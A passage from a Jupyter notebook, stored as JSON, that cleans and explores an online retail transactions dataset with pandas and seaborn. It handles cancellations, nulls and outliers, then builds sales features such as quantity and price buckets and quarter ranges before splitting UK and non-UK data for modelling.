data."},{"metadata":{"id":"lqlGgcdiqAos","colab_type":"text"},"cell_type":"markdown","source":"# 2. Exploratory data analysis"},{"metadata":{},"cell_type":"markdown","source":"Every data science project starts with EDA as we have to understand what do we have to deal with. I divide EDA into 2 types: visual and numerical. Let's start with numerical as the simple pndas method *.describe()* gives us a lot of useful information."},{"metadata":{"id":"G0XGUAZFrk6v","colab_type":"text"},"cell_type":"markdown","source":"## 2.1. Quick statistical overview"},{"metadata":{"id":"pE4rxL-ZfwAe","colab_type":"code","outputId":"ef3791d5-e67f-4645-d52f-3ba4200d7fda","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"LOSySaN7qUdX","colab_type":"text"},"cell_type":"markdown","source":"Just a quick look at data with *.describe()* method gives us a lot of space to think. We see negative quantities and prices, we can see that not all records have CustomerID data, we can also see that the majority of transactions are for quantites from 3 to 10 items, majority of items have price up to 5 pounds and that we have a bunch of huge outliers we will have to deal with later."},{"metadata":{"id":"r_MIrqRYrqrG","colab_type":"text"},"cell_type":"markdown","source":"## 2.2. Dealing with types"},{"metadata":{},"cell_type":"markdown","source":"*.read_csv()* method performs basic type check, but it doesn't do that perfectly. That's why it is much better to deal with data types in our dataframe before any modifications to prevent additional difficulties. Every pandas dataframe has an attribute *.dtypes* which will help us understand what we currently have and what data has to be casted to correct types."},{"metadata":{"id":"XY4J_0KBqJGe","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":181},"outputId":"a38be5ea-091e-4dc1-fb56-1b6b739e088e","trusted":true},"cell_type":"code","source":"df.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"iRgA1W66rTtM","colab_type":"text"},"cell_type":"markdown","source":"If we have datetime data it's better to cast it to datetime type. We don't touch InvoiceNo for now as it seems like data in this column has not only numbers. 
(we saw just first 5 rows, while pandas during import scanned all the data and found that the type here is not numerical)."},{"metadata":{"id":"qQ6gDvmV8a69","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\ndf = df.set_index('InvoiceDate')","execution_count":null,"outputs":[]},{"metadata":{"id":"UWSslxBNrgqG","colab_type":"text"},"cell_type":"markdown","source":"## 2.3. Dealing with null values"},{"metadata":{},"cell_type":"markdown","source":"Next and very important step is dealing with missing values. Normally if you encounter null values in the dataset you have to understand nature of those null values and possible impact they could have on the model. There are few strategies that we can use to fix our issue with null values: \n* delete rows with null values\n* delete the feature with null values\n* impute data with mean or median values or use another imputing strategy (method *.fillna()*)\n\nLet's check out what we have here."},{"metadata":{"id":"5TDxDE_NgR-_","colab_type":"code","outputId":"175b502c-7ac3-4cea-b30f-fb4e9f7afb1a","colab":{"base_uri":"https://localhost:8080/","height":163},"trusted":true},"cell_type":"code","source":"df.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"lmL-TjEIr8Tz","colab_type":"text"},"cell_type":"markdown","source":"CustomerID has too much null values and this feature cannot predict a lot so we can just drop it. Also it could be reasonable to create another feature \"Amount of orders per customer\", but.... next time ;)"},{"metadata":{"id":"qZHLLtsRqPTA","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df.drop(columns=['CustomerID'])","execution_count":null,"outputs":[]},{"metadata":{"id":"_oFg_pKssgLp","colab_type":"text"},"cell_type":"markdown","source":"Let's check out what kind of nulls we have in Description"},{"metadata":{"id":"rQkkpcUnsqef","colab_type":"code","outputId":"6d5126e2-7b58-459a-a71c-cd1de52f6e10","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df[df['Description'].isnull()].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"RrpxM_SasxCU","colab_type":"text"},"cell_type":"markdown","source":"The data in these rows is pretty strange as UnitPrice is 0, so these orders do not generate any sales. I think, we can impute it with \"UNKNOWN ITEM\" at the moment and deal with those later during the analysis."},{"metadata":{"id":"eIIq-a31t3mm","colab_type":"code","outputId":"b788c188-bb34-47a5-c374-ba05b88fab66","colab":{"base_uri":"https://localhost:8080/","height":145},"trusted":true},"cell_type":"code","source":"df['Description'] = df['Description'].fillna('UNKNOWN ITEM')\ndf.isnull().sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"B_RRuBfHyzKm","colab_type":"text"},"cell_type":"markdown","source":"## 2.4. Checking out columns separately"},{"metadata":{},"cell_type":"markdown","source":"Also it makes sense to go feature by feature and check what pitfalls we have in our data and also to understand our numbers better. "},{"metadata":{"id":"rGmT3rxntRwp","colab_type":"text"},"cell_type":"markdown","source":"Let's continue checking Description column. Here we can see items that were bought most often. 
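Alongside the raw counts below, it can be handy to look at shares as well; a tiny sketch, assuming `df` is the frame we have been cleaning up so far:

```python
# Same idea as value_counts(), but normalize=True turns counts into fractions of all rows
top_share = df['Description'].value_counts(normalize=True).head(10)
print((top_share * 100).round(2))  # top items as a percentage of all order lines
```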
"},{"metadata":{"id":"2zRnyeufgBDa","colab_type":"code","outputId":"48a7535a-7265-4dd3-d53b-11e1f26ff41b","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Here we can see our best selling products, items that appear in orders the most often. Also to make it visually more appealing let's create a bar chart for 15 top items."},{"metadata":{"id":"JuNgVd6PGt7Y","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":585},"outputId":"47fc5972-c3bb-4145-9209-19964ddcc9a2","trusted":true},"cell_type":"code","source":"item_counts = df['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(item_counts.index, item_counts.values, palette=sns.cubehelix_palette(15))\nplt.ylabel(\"Counts\")\nplt.title(\"Which items were bought more often?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"trusted":true},"cell_type":"code","source":"df['Description'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"pgxFvFL0xEL4","colab_type":"text"},"cell_type":"markdown","source":"We also notice from above code that valid items are normally uppercased and non-valid or cancelations are in lower case"},{"metadata":{"id":"0RMbj7vsu3kZ","colab_type":"code","outputId":"a79e7b03-11da-4cc8-9601-497123b134b7","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df[~df['Description'].str.isupper()]['Description'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Quick check of the case of letters in Description says that there are some units with lower case letters in their name and also that lower case records are for canceled items. 
Here we can understand that data management in the store can be improved."},{"metadata":{"id":"YxTPItIwJQTV","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":567},"outputId":"c2caac93-0726-4cb6-faf2-063ff23c612a","trusted":true},"cell_type":"code","source":"lcase_counts = df[~df['Description'].str.isupper()]['Description'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(lcase_counts.index, lcase_counts.values, palette=sns.color_palette(\"hls\", 15))\nplt.ylabel(\"Counts\")\nplt.title(\"Not full upper case items\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"FIdbxmgjxnV9","colab_type":"text"},"cell_type":"markdown","source":"ALso checking out stoke codes, looks like they are deeply correlated with descriptions - which makes perfect sense."},{"metadata":{"id":"Ifuzm9k3wiZC","colab_type":"code","outputId":"69b593a7-0512-43e8-dc00-fe637f110110","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['StockCode'].value_counts().head()","execution_count":null,"outputs":[]},{"metadata":{"id":"mYNaQ_KmK6YH","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"45b22661-378f-4bbe-b1e1-9f912e240e84","trusted":true},"cell_type":"code","source":"stock_counts = df['StockCode'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(stock_counts.index, stock_counts.values, palette=sns.color_palette(\"GnBu_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which stock codes were used the most?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"CyIqQt3rx3eo","colab_type":"text"},"cell_type":"markdown","source":"Checking out also InvoiceNo feature."},{"metadata":{"id":"-07Q-Xp3xjSU","colab_type":"code","outputId":"9ade42df-5062-40a9-e649-58ccf31e4d77","colab":{"base_uri":"https://localhost:8080/","height":126},"trusted":true},"cell_type":"code","source":"df['InvoiceNo'].value_counts().tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"5aSNIrR4LnuS","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":416},"outputId":"bdbc0532-dd9b-4dc2-f1b2-f77a390e420e","trusted":true},"cell_type":"code","source":"inv_counts = df['InvoiceNo'].value_counts().sort_values(ascending=False).iloc[0:15]\nplt.figure(figsize=(18,6))\nsns.barplot(inv_counts.index, inv_counts.values, palette=sns.color_palette(\"BuGn_d\"))\nplt.ylabel(\"Counts\")\nplt.title(\"Which invoices had the most items?\");\nplt.xticks(rotation=90);","execution_count":null,"outputs":[]},{"metadata":{"id":"swUMOF-fx5qy","colab_type":"code","outputId":"6e23df48-7cf8-4a4a-e980-aec224a8a6fb","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['InvoiceNo'].str.startswith('C')].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"hq-lWQhUyQQR","colab_type":"text"},"cell_type":"markdown","source":"Looks like Invoices that start with 'C' are the \"Canceling\"/\"Returning\" invoices. This resolves the mistery with negative quantities. 
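Before we drop them, a quick sketch to size up that slice (assuming `df` still contains the 'C' invoices at this point):

```python
# How many order lines are we about to throw away as cancellations?
cancel_mask = df['InvoiceNo'].astype(str).str.startswith('C')
print(f"{cancel_mask.sum()} rows ({cancel_mask.mean() * 100:.2f}%) sit on 'C' (cancellation) invoices")
```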
\n\nAlthough, we should've gotten deeper into analysis of those returns, for the sake of simplicity let's just ignore those values for the moment.\n\nWe can actually start a separate project based on that data and predict the returning/cancelling rates for the store."},{"metadata":{"id":"yJI3a_ew1OKp","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df = df[~df['InvoiceNo'].str.startswith('C')]","execution_count":null,"outputs":[]},{"metadata":{"id":"08Bdxo0m0neI","colab_type":"code","outputId":"05306d9c-e047-4a7f-d722-74adbf3f8195","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"8czolNlTykMw","colab_type":"text"},"cell_type":"markdown","source":"During exploratory data analysis we can go back to the same operations and checks, just to understand how our actions affected the dataset. EDA is the series of repetitive tasks to understand better our data. And here, for example we get back to *.describe()* method to get an overall picture of our data after some manipulations. \n\nWe still see negative quantities and negative prices, let's get into those records.\n\n"},{"metadata":{"id":"A9i_--Qwq7Hm","colab_type":"code","outputId":"34f01616-e351-4299-9063-ee9f37b41dd8","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"# df[df['Quantity'] < 0]\ndf[df['Quantity'] < 0].head()","execution_count":null,"outputs":[]},{"metadata":{"id":"O7rxmQPd13Ob","colab_type":"text"},"cell_type":"markdown","source":"Here we can see that other \"Negative quantities\" appear to be damaged/lost/unknown items. Again, we will just ignore them for the sake of simplicity of analysis for this project."},{"metadata":{"id":"klcGgM0ZroQJ","colab_type":"code","outputId":"16a57920-5ffd-424a-bea0-0f659f54dee9","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['Quantity'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"wkKCHTG82aPC","colab_type":"text"},"cell_type":"markdown","source":"We also see negative UnitPrice, which is not normal as well. Let's check this out."},{"metadata":{"id":"6inbAyKqrLlI","colab_type":"code","outputId":"d9da9005-0fdd-4c93-87b2-9e8ce268e388","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] < 0].describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"acGrnc1WrVc7","colab_type":"code","outputId":"b5b15dc6-29e7-4955-c1d7-849cb3e275c2","colab":{"base_uri":"https://localhost:8080/","height":138},"trusted":true},"cell_type":"code","source":"df[df['UnitPrice'] == -11062.06]","execution_count":null,"outputs":[]},{"metadata":{"id":"0wOWI0WT2k06","colab_type":"text"},"cell_type":"markdown","source":"As there are just two rows, let's ignore them for the moment (description gives us enough warnings, althoug we still need some context to understand it better)"},{"metadata":{"id":"etvXHm7K29rg","colab_type":"code","outputId":"46e242c3-8d06-4499-d366-62d416d17655","colab":{"base_uri":"https://localhost:8080/","height":288},"trusted":true},"cell_type":"code","source":"df = df[df['UnitPrice'] > 0]\ndf.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we have finished cleaning our data and removed all suspicious records we can start creating some new features for our model. 
Let's start with the most obvious one - Sales. We have quantities, we have prices - we can calculate the revenue."},{"metadata":{"id":"S2AxwWDJ3OFO","colab_type":"code","outputId":"f557fb65-da23-482a-8560-231c5710abfd","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df['Sales'] = df['Quantity'] * df['UnitPrice']\ndf.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"gYqYN2LszQro","colab_type":"text"},"cell_type":"markdown","source":"# 3. Visual EDA"},{"metadata":{"id":"afZL4I1q6vlo","colab_type":"code","outputId":"eb25f2bd-1466-482f-997a-f2ccfb717fcc","colab":{"base_uri":"https://localhost:8080/","height":406},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(3,6))\nsns.countplot(df[df['Country'] == 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"onb0ByML3dQe","colab_type":"code","outputId":"43bd565a-d12a-4ac6-c198-6043b065bbcc","colab":{"base_uri":"https://localhost:8080/","height":541},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nsns.countplot(df[df['Country'] != 'United Kingdom']['Country'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"K79ODkHYznEr","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":35},"outputId":"7910c5a6-96f0-4d73-b6aa-0580b04163b1","trusted":true},"cell_type":"code","source":"uk_count = df[df['Country'] == 'United Kingdom']['Country'].count()\nall_count = df['Country'].count()\nuk_perc = uk_count/all_count\nprint(str('{0:.2f}%').format(uk_perc*100))","execution_count":null,"outputs":[]},{"metadata":{"id":"zVPKRDC-zWAW","colab_type":"text"},"cell_type":"markdown","source":"From above plots and calculations we can see that vast majority of sales were made in UK and just 8.49% went abroad. We can say our dataset is skewed to the UK side :D."},{"metadata":{"id":"uSCNB39c1p-K","colab_type":"text"},"cell_type":"markdown","source":"## 3.1. Detecting outliers"},{"metadata":{},"cell_type":"markdown","source":"There are few different methods to detect outliers: box plots, using [IQR](https://en.wikipedia.org/wiki/Interquartile_range), scatter plot also works in some cases (and this is one of those). Also, detecting outliers using scatter plot is pretty intuitive. You plot your data and remove data points that visually are definitely out of range. Like in the chart below."},{"metadata":{"id":"n0tRONoX7zV8","colab_type":"code","outputId":"b5956cde-dc7a-452a-d737-252efb18f632","colab":{"base_uri":"https://localhost:8080/","height":389},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])","execution_count":null,"outputs":[]},{"metadata":{"id":"jB9G52F79ryZ","colab_type":"text"},"cell_type":"markdown","source":"Let's remove obvious outliers"},{"metadata":{"id":"WxEj3y-z9zHj","colab_type":"code","outputId":"75121918-2d46-4566-8561-8ad7724ad896","colab":{"base_uri":"https://localhost:8080/","height":438},"trusted":true},"cell_type":"code","source":"df = df[df['Sales'] < 25000]\nplt.figure(figsize=(18,6))\nplt.scatter(x=df.index, y=df['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"il5rP2rR10ao","colab_type":"text"},"cell_type":"markdown","source":"After removing obvious outliers we still see some values that are out of normal distribution. 
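One standard way to formalise "out of range" is the IQR rule mentioned a moment ago; we will go the percentile route below, but for comparison this is roughly what the IQR filter would look like (a sketch, assuming `df` already has the Sales column):

```python
# Interquartile-range rule: keep Sales within [Q1 - 1.5*IQR, Q3 + 1.5*IQR]
q1, q3 = df['Sales'].quantile([0.25, 0.75])
iqr = q3 - q1
df_iqr = df[df['Sales'].between(q1 - 1.5 * iqr, q3 + 1.5 * iqr)]
print(f"IQR filter would keep {len(df_iqr)} of {len(df)} rows")
```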
To understand better the distribution of our data let's check out different percentiles of our numeric features. "},{"metadata":{"id":"Wd6lkccmCXnY","colab_type":"code","outputId":"a7c2a5bf-e30f-4edb-be89-795b2ff1c191","colab":{"base_uri":"https://localhost:8080/","height":198},"trusted":true},"cell_type":"code","source":"df.quantile([0.05, 0.95, 0.98, 0.99, 0.999])","execution_count":null,"outputs":[]},{"metadata":{"id":"e0Xyxllp2ZI2","colab_type":"text"},"cell_type":"markdown","source":"We can see that if we remove top 2% of our data points we will get rid of absolute outliers and will have more balaced dataset."},{"metadata":{"id":"ntKRBQa-MZEt","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":330},"outputId":"9aea8dde-8243-460f-8133-a7d647d90ac5","trusted":true},"cell_type":"code","source":"df_quantile = df[df['Sales'] < 125]\nplt.scatter(x=df_quantile.index, y=df_quantile['Sales'])\nplt.xticks(rotation=90)","execution_count":null,"outputs":[]},{"metadata":{"id":"BZ5zrj1JNaA7","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"e087d72d-ef1a-4694-a0ba-eb7a69506d71","trusted":true},"cell_type":"code","source":"df_quantile.describe()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"Looks like our data is almost ready for modelling. We performed a clean up, we removed outliers that were disturbing the balance of our dataset, we removed invalid records - now our data looks much better! and it doesn't lose it's value."},{"metadata":{"id":"PPX6LukY3Cpf","colab_type":"text"},"cell_type":"markdown","source":"## 3.2. Visually checking distribution of numeric features"},{"metadata":{"id":"zj1rJmD1NB8P","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":281},"outputId":"b380c7b0-21e7-45aa-db9c-ddf2beaac225","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 10]['UnitPrice'].values, kde=True, bins=10)","execution_count":null,"outputs":[]},{"metadata":{"id":"iV5Lv1YXUonz","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"96b5b822-dbe0-46ed-d6d3-03cc7165023e","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['UnitPrice'] < 5]['UnitPrice'].values, kde=True, bins=10, color='green')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can see that vast majority of items sold in this store has low price range - 0 to 3 pounds. 
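To put a number on that claim, a one-liner (assuming the `df_quantile` frame defined above):

```python
# What share of order lines is priced at 3 pounds or less?
share_under_3 = (df_quantile['UnitPrice'] <= 3).mean()
print(f"{share_under_3 * 100:.1f}% of rows have UnitPrice <= 3")
```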
"},{"metadata":{"id":"MadAXAn0TuCZ","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"082d181e-a654-4a68-89a3-4dd761891705","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 30]['Quantity'], kde=True, bins=10, color='red')","execution_count":null,"outputs":[]},{"metadata":{"id":"uDPI8FLbUxRl","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"27f01b22-1973-475a-8164-80ce816b8c61","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Quantity'] <= 15]['Quantity'], kde=True, bins=10, color='orange')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we that people bought normally 1-5 items or 10-12 - maybe there were some kind of offers for sets?"},{"metadata":{"id":"NUSMODaWUXgm","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"a9a22872-3d5a-4e06-b1ee-40a4bab64e24","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 60]['Sales'], kde=True, bins=10, color='purple')","execution_count":null,"outputs":[]},{"metadata":{"id":"271Hrgm-U5FK","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":280},"outputId":"f133732c-ae41-4ca2-94a1-71677ed5d0e2","trusted":true},"cell_type":"code","source":"plt.figure(figsize=(12,4))\nsns.distplot(df_quantile[df_quantile['Sales'] < 30]['Sales'], kde=True, bins=10, color='grey')","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"From these histograms we can understand that majority of sales per order were in range 1-15 pounds each."},{"metadata":{"id":"MNCUZ2DO3mHM","colab_type":"text"},"cell_type":"markdown","source":"## 3.3. Analysing sales over time"},{"metadata":{"id":"KCPCF-ZsDHpL","colab_type":"code","outputId":"b983fc93-0851-4316-e873-164c7679061a","colab":{"base_uri":"https://localhost:8080/","height":228},"trusted":true},"cell_type":"code","source":"df_ts = df[['Sales']]\ndf_ts.head()","execution_count":null,"outputs":[]},{"metadata":{},"cell_type":"markdown","source":"As we can see every invoice has it's own timestamp (definitely based on time the order was made). 
We can resample time data by, for example weeks, and try see if there is any patterns in our sales."},{"metadata":{"id":"k9vEWHcHEaND","colab_type":"code","outputId":"7f692faa-9857-42b7-a41a-5c2d83fefd9d","colab":{"base_uri":"https://localhost:8080/","height":326},"trusted":true},"cell_type":"code","source":"plt.figure(figsize=(18,6))\ndf_resample = df_ts.resample('W').sum()\ndf_resample.plot()","execution_count":null,"outputs":[]},{"metadata":{"id":"zFi5bGs534oQ","colab_type":"text"},"cell_type":"markdown","source":"That week with 0 sales in January looks suspicious, let's check it closer"},{"metadata":{"id":"1QXCBgf8WQUD","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":348},"outputId":"55d754dc-79af-4722-bba6-726d6f7329a0","trusted":true},"cell_type":"code","source":"df_resample['12-2010':'01-2011']","execution_count":null,"outputs":[]},{"metadata":{"id":"U7o8UfRB4GLy","colab_type":"text"},"cell_type":"markdown","source":"Now it makes sense - possibly, during the New Year holidays period the store was closed and didn't process orders, that's why they didn't make any sales."},{"metadata":{"id":"NIpdfJcS4mbx","colab_type":"text"},"cell_type":"markdown","source":"# 4. Preparing data for modeling and feature creation"},{"metadata":{},"cell_type":"markdown","source":"Now it comes the most fun part of the project - building a model. To do this we will need to create few more additional features to make our model more sophisticated."},{"metadata":{"id":"Z26VIUm8VJ0M","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"acaee750-803a-4332-c724-9f2568620b51","trusted":true},"cell_type":"code","source":"df_clean = df[df['UnitPrice'] < 15]\ndf_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"4ddHzAzmkAx9","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":235},"outputId":"8834df7a-f77b-4a7a-a50e-0e26afd503f4","trusted":true},"cell_type":"code","source":"df_clean.index","execution_count":null,"outputs":[]},{"metadata":{"id":"IJST6pYl47s6","colab_type":"text"},"cell_type":"markdown","source":"## 4.1. Quantity per invoice feature"},{"metadata":{},"cell_type":"markdown","source":"A feature that could influence the sales output could be \"Quantity per invoice\". 
Let's find the data for this feature."},{"metadata":{"id":"XeL8mapkXU3c","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_join = df_clean.groupby('InvoiceNo')[['Quantity']].sum()","execution_count":null,"outputs":[]},{"metadata":{"id":"yB4Fqi0qf-tx","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"8be7a159-28ed-4e2e-8576-76f94311df48","trusted":true},"cell_type":"code","source":"df_join = df_join.reset_index()\ndf_join.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"4q88pvAuX2Rh","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":607},"outputId":"bb6ce533-2ee6-42e2-adaa-ea49e04720ac","trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = df_clean.index\ndf_clean = df_clean.merge(df_join, how='left', on='InvoiceNo')\ndf_clean = df_clean.rename(columns={'Quantity_x' : 'Quantity', 'Quantity_y' : 'QuantityInv'})\ndf_clean.tail(15)","execution_count":null,"outputs":[]},{"metadata":{"id":"FkOT2yPciD0Q","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":288},"outputId":"c0fbb47b-ff20-4189-8433-14a1a14f6663","trusted":true},"cell_type":"code","source":"df_clean.describe()","execution_count":null,"outputs":[]},{"metadata":{"id":"DDzWZ6K_o4z0","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_clean['InvoiceDate'] = pd.to_datetime(df_clean['InvoiceDate'])","execution_count":null,"outputs":[]},{"metadata":{"id":"2tQTQyu4pBaf","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":199},"outputId":"11c8b52d-9760-460c-e1e7-749defaf9e4f","trusted":true},"cell_type":"code","source":"df_clean.dtypes","execution_count":null,"outputs":[]},{"metadata":{"id":"BirwPlbT5SRb","colab_type":"text"},"cell_type":"markdown","source":"## 4.2. Bucketizing Quantity and UnitPrice features"},{"metadata":{"id":"AOfQmYrH5fxk","colab_type":"text"},"cell_type":"markdown","source":"Based on the EDA done previously we can group these features into 6 buckets for Quantity and 5 for UnitePrice using pandas .cut() method."},{"metadata":{"id":"PxLoYdjImDsy","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"9f1e0505-65aa-4ad8-c629-507e7ba6964d","trusted":true},"cell_type":"code","source":"bins_q = pd.IntervalIndex.from_tuples([(0, 2), (2, 5), (5, 8), (8, 11), (11, 14), (15, 5000)])\ndf_clean['QuantityRange'] = pd.cut(df_clean['Quantity'], bins=bins_q)\nbins_p = pd.IntervalIndex.from_tuples([(0, 1), (1, 2), (2, 3), (3, 4), (4, 20)])\ndf_clean['PriceRange'] = pd.cut(df_clean['UnitPrice'], bins=bins_p)\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"v66wi4HE59RQ","colab_type":"text"},"cell_type":"markdown","source":"## 4.3. Extracting and bucketizing dates"},{"metadata":{"id":"FOZtgaSQ6McM","colab_type":"text"},"cell_type":"markdown","source":"We have noticed that depends on a season gifts sell differently: pick of sales is in the Q4, then it drastically drops in Q1 of the next year and continues to grow till its new pick in Q4 again. 
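A quick way to sanity-check that seasonal pattern is a quarterly resample; a sketch, using the InvoiceDate column because the merge above reset the index:

```python
# Revenue per quarter, resampling on the InvoiceDate column rather than the index
quarterly_sales = df_clean.resample('Q', on='InvoiceDate')['Sales'].sum()
print(quarterly_sales)
```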
From this observation we can create another feature that could improve our model."},{"metadata":{"id":"yBChTJkks6Pq","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"9ae44644-c18e-4633-8649-68cb46bad8a7","trusted":true},"cell_type":"code","source":"df_clean['Month'] = df_clean['InvoiceDate'].dt.month\ndf_clean.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"jxsN8XZVqmgU","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"b4e4d754-b9b9-4707-8eb1-db31303cf422","trusted":true},"cell_type":"code","source":"bins_d = pd.IntervalIndex.from_tuples([(0,3),(3,6),(6,9),(9,12)])\ndf_clean['DateRange'] = pd.cut(df_clean['Month'], bins=bins_d, labels=['q1','q2','q3','q4'])\ndf_clean.tail()","execution_count":null,"outputs":[]},{"metadata":{"id":"VV_-KJsD8AMi","colab_type":"text"},"cell_type":"markdown","source":"# 5. Building a model"},{"metadata":{"id":"zoj-cC6N6wHN","colab_type":"text"},"cell_type":"markdown","source":"## 5.1. Splitting data into UK and non-UK"},{"metadata":{"id":"LCuO7Bdz64di","colab_type":"text"},"cell_type":"markdown","source":"We have to analyze these 2 datasets separately to have more standardized data for a model, because there can be some patterns that work for other countries and do not for UK or vise versa. Also a hypothesis to test - does the model built for UK performs good on data for other countries? "},{"metadata":{"id":"xmWtfOhCvdft","colab_type":"code","colab":{},"trusted":true},"cell_type":"code","source":"df_uk = df_clean[df_clean['Country'] == 'United Kingdom']\ndf_abroad = df_clean[df_clean['Country'] != 'United Kingdom']","execution_count":null,"outputs":[]},{"metadata":{"id":"Jr4lhQyFvsH0","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":285},"outputId":"0af6cb14-195a-460d-bfd8-212a8625520c","trusted":true},"cell_type":"code","source":"df_uk.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"7m7-iaA-8HMk","colab_type":"text"},"cell_type":"markdown","source":"## 5.2. Extracting features and creating dummy variables"},{"metadata":{"id":"0J8hPy4HwW0X","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":198},"outputId":"b11bc87e-524c-49fe-cdab-c75f697166c1","trusted":true},"cell_type":"code","source":"df_uk_model = df_uk[['Sales', 'QuantityInv', 'QuantityRange', 'PriceRange', 'DateRange']]\ndf_uk_model.head()","execution_count":null,"outputs":[]},{"metadata":{"id":"SZRq6C640Blc","colab_type":"code","colab":{"base_uri":"https://localhost:8080/","height":215},"outputId":"5cc68aba-1928-4e80-c481-27f4b5434530","trusted":true},"cell_type":"code","source":"df_data = df_uk_model.copy()\ndf_data = pd.get_dummies(df_data, columns=['QuantityRange'], 